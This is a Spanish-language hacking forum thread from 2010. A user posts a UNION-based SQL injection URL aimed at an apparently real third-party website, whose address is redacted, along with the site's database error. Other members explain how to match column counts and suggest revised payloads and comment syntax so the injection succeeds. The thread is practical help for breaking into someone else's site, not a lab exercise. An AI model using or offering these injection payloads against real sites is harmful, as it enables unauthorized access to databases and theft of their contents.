[Ayuda]MySql injection.

Iniciado por PHAMTOM, 12 Agosto 2010, 04:43 AM

0 Miembros y 1 Visitante están viendo este tema.

PHAMTOM

Buenas tengo una pagina,que me tiro error al hacer una consulta.

http://xxxx.xx/index.php?not=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%E7&idc=38&p=1

el error es


No se pudo ejecutar la consulta

SELECT not_id,not_fecha,not_titulo,not_imagen,not_contenido,not_enlace FROM ptc_noticias WHERE not_id=-1 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--ç ORDER BY not_fecha

Error MySQL: : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ç ORDER BY not_fecha' at line 1

-----------------

Esta pagina es vulnerable a mysqlinject ? , una vez que termine de concactenar todas las columnas podre seguir como una inyeccion normal, ?? o asi no llegare a nada.salu2
Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más

Shell Root

#1
A ver, hasta donde sé, si no me equivoco. Al unir un SELECT con otro SELECT, se necesita tener los mismos campos que el primer SELECT. Es decir,
Código (sql) [Seleccionar]
SELECT id, nombre, email FROM tbl_usuarios WHERE id = -1 UNION ALL SELECT 1, 2, 3--
El resultado sería:
id nombre email
1 2 3


Si se incluye ', 4' dentro del segundo SELECT, aparecería
Código (sql) [Seleccionar]

SELECT id, nombre, email FROM tbl_usuarios WHERE id = -1 UNION ALL SELECT 1, 2, 3, 4--
#1222 - The used SELECT statements have a different number of columns


Lo otro, no entiendo del porque el ORDER BY not_fecha, esta allí donde lo tienes, xD. Nisiquiera esta en el contexto de la query, y si está, estaría como comentario.

___________
PD: Intentad así,
Código (sql) [Seleccionar]
-1+union+select+1,2,3,4,5,6--&idc=38&p=1
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

tragantras

parece un residuo de la anterior query, prueba a comentar el final con \* en vez de con --
Colaboraciones:
1 2